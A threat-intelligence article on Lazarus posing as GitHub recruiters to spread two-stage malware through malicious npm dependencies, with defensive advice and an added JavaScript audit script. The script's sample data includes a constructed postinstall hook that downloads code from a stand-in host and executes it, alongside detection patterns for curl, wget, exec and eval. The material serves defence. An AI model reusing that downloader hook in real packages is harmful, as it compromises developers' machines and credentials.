Inside Cyber Deception: How Lazarus APT Group Targets Developers with Impersonation Strategy

North Korea’s state-sponsored advanced persistent threat (APT) group Lazarus, known for cyber espionage and financial theft, has launched a new impersonation campaign. This time the group poses as GitHub developers and recruiters and targets a small, hand-picked set of tech employees with social engineering. The objective is to deliver malware through malicious npm (Node package manager) dependencies, poisoning the software supply chain at the point where a developer runs an install. This article walks through the campaign and the steps that defend against it.

The Lazarus APT Group: North Korea’s State-Sponsored Cyber Threat

Lazarus is a well-known APT group, widely assessed to be operated by North Korea’s Reconnaissance General Bureau (RGB), the country’s main foreign intelligence service. With a record of both cyber espionage and large-scale financial theft, Lazarus has consistently targeted organisations across many sectors worldwide.

Impersonation Scam: Lazarus Posing as GitHub Developers and Recruiters

In its latest campaign, Lazarus has adopted a new tactic: impersonating legitimate GitHub developers and recruiters. The operators build convincing personas and contact tech employees from GitHub or social media accounts that appear genuine, which hides the malicious intent behind an ordinary collaboration request.

Social Engineering Attacks Targeting Tech Employees

Lazarus uses social engineering to lure targets into joining GitHub development projects. It sends invitations to tech employees, particularly those working in the blockchain, cryptocurrency, online gambling and cybersecurity sectors. A victim who accepts and starts working on the repository is, without realising it, running the attacker’s code on their own machine.

Malware Spread via Malicious npm Dependencies

The goal of the campaign is to trick victims into cloning and executing the contents of a GitHub repository that starts a two-stage malware attack. The repository depends on npm packages under the attacker’s control, so the act of installing its dependencies pulls malicious code onto the developer’s system. This is the software supply chain poisoned at the dependency level: the victim never has to download an obviously suspicious binary.

Lazarus: APT Known for Cyber Espionage and Financial Fraud

Lazarus stands out among APT groups for combining espionage with financially motivated crime. It has been linked to thefts from financial institutions and cryptocurrency platforms, as well as to the destructive attack on Sony Pictures in 2014. Its extensive capabilities and persistent operations make it one of the more significant threats in cyberspace.

Targeting Accounts Connected to Blockchain, Cryptocurrency, and Online Gambling Sectors

To maximise its impact, Lazarus specifically targets developer accounts associated with blockchain technology, cryptocurrencies, online gambling and cybersecurity. These sectors are attractive because their developers often hold credentials, signing keys or wallet access that translate directly into money, and because one compromised developer workstation can expose code shipped to many customers.

Campaign Aims to Spread Two-Stage Malware Attack Through GitHub Repositories

By enticing victims to clone and execute contents from seemingly legitimate GitHub repositories, Lazarus initiates a two-stage malware attack. The first stage is the code that runs when the repository’s dependencies are installed; it establishes the initial infection and retrieves the second stage, which sets up persistence and gives the attacker remote access to the victim’s system.

Poisoning the Software Supply Chain with npm Packages

Delivering the payload as npm packages gives Lazarus reach and cover. The attacker publishes malicious packages and lists them as dependencies of the bait repository, so the malicious code is fetched and executed by the normal install process rather than by anything the victim would recognise as untrusted. Because install-time scripts run with the developer’s privileges, a single poisoned dependency can compromise the workstation, and through it the credentials and source code of every project that developer touches. The damage therefore outlives the initial attack.

GitHub Takes Action: Suspends Accounts and Shares Indicators of Compromise

In response to the campaign, GitHub suspended both the npm and GitHub accounts associated with the attack. It also published indicators of compromise so that potentially affected organisations can check their own systems and mitigate the threat.

Steps to Protect Against the Campaign: Review Security Logs and Be Cautious of Social Media Solicitations

To protect against the impersonation and malware campaign, individuals and organisations should review their security logs for suspicious events, such as unexpected outbound connections or processes spawned during a package install. Anyone who believes they were approached should promptly inform their employer’s security team. Developers should treat unsolicited collaboration requests and requests to install particular npm packages with caution, especially when they relate to the targeted sectors. Before running an install, inspect the dependency tree and any lifecycle scripts (preinstall, install, postinstall, prepare); a script that makes network connections or spawns processes during installation is the hallmark of this attack and should be blocked until it has been reviewed.
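The check described above, written out as an added example (this is not code from the article or from GitHub’s advisory): a small audit of npm lifecycle hooks. It goes slightly beyond the single case in the text by inspecting every install-time hook and, where a hook runs a script file shipped with the package, judging that file rather than just the command line. The package names, file contents and the `updates.example.invalid` host are constructed for the demonstration; a real run would load each `node_modules/*/package.json` instead of the inline manifests.

```javascript
// Added example, not code from the article or from GitHub's advisory: audit npm
// lifecycle hooks for install-time behaviour typical of a downloader.
// Manifests below are constructed inline (hypothetical names and hosts).
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Patterns rarely needed by a legitimate install but typical of a stager:
// network fetches, shelling out, dynamic code, encoded blobs.
const SUSPICIOUS_PATTERNS = [
  { name: 'remote fetch', re: /\b(curl|wget|fetch\(|https?:\/\/)/i },
  { name: 'shell/exec',   re: /\b(child_process|exec\(|execSync|spawn\()/ },
  { name: 'dynamic eval', re: /\b(eval\(|new Function\()/ },
  { name: 'encoded blob', re: /\b(base64|atob\()/i },
];

function matchPatterns(text) {
  return SUSPICIOUS_PATTERNS.filter((p) => p.re.test(text)).map((p) => p.name);
}

// Audit one manifest. `pkg.files` maps file names to contents so that a hook
// such as "node setup.js" is judged by the script it runs, not just the command.
function auditManifest(pkg) {
  const findings = [];
  const scripts = pkg.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (!(hook in scripts)) continue;
    const command = scripts[hook];
    const suspicious = new Set(matchPatterns(command));
    const invoked = command.match(/\bnode\s+([^\s&;|]+)/);
    if (invoked && pkg.files && invoked[1] in pkg.files) {
      for (const name of matchPatterns(pkg.files[invoked[1]])) suspicious.add(name);
    }
    findings.push({ package: pkg.name, hook, command, suspicious: [...suspicious] });
  }
  return findings;
}

// Triage a dependency set: hooks with suspicious content are blocked, any other
// install-time hook is queued for manual review, packages without hooks pass.
function riskReport(manifests) {
  const report = { block: [], review: [] };
  for (const pkg of manifests) {
    const findings = auditManifest(pkg);
    if (findings.length === 0) continue;
    const bad = findings.some((f) => f.suspicious.length > 0);
    (bad ? report.block : report.review).push(pkg.name);
  }
  return report;
}

// Constructed sample manifests (not real packages): one with no hooks, one with
// a normal native build step, one whose postinstall fetches and runs remote code.
const SAMPLE_MANIFESTS = [
  { name: 'plain-utils', version: '1.0.0' },
  { name: 'native-binding', version: '2.3.1', scripts: { postinstall: 'node-gyp rebuild' } },
  {
    name: 'trading-sdk-installer', version: '0.0.9',
    scripts: { postinstall: 'node setup.js' },
    files: {
      'setup.js': [
        "const { execSync } = require('child_process');",
        "const https = require('https');",
        "https.get('https://updates.example.invalid/stage2', (res) => {",
        "  let body = ''; res.on('data', (c) => (body += c));",
        "  res.on('end', () => execSync(body));",
        '});',
      ].join('\n'),
    },
  },
];

console.log(JSON.stringify(riskReport(SAMPLE_MANIFESTS), null, 2));
```

Running the block reports `trading-sdk-installer` under `block` and `native-binding` under `review`: a build step like `node-gyp rebuild` is common and legitimate, so the audit asks a human to look rather than refusing it outright. Pattern matching of this kind is a triage aid, not a proof of safety; obfuscated scripts will evade it. The stronger control is to stop hooks running at all until a package has been reviewed: `npm install --ignore-scripts`, or `ignore-scripts=true` in the project’s `.npmrc`, skips the lifecycle hooks, at the cost of breaking packages that genuinely need an install-time build.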

Lazarus’ latest campaign, in which it impersonates GitHub developers and recruiters, poses a real threat to tech employees in the targeted sectors. By combining social engineering with malicious npm packages, the group turns a routine dependency install into the first stage of a two-stage malware attack. Remaining alert to unsolicited collaboration requests, reviewing security logs, and inspecting dependencies and their install scripts before running them are the practical defences. GitHub’s account suspensions and published indicators show that countering supply-chain attacks is a shared effort between platforms and the developers who use them.
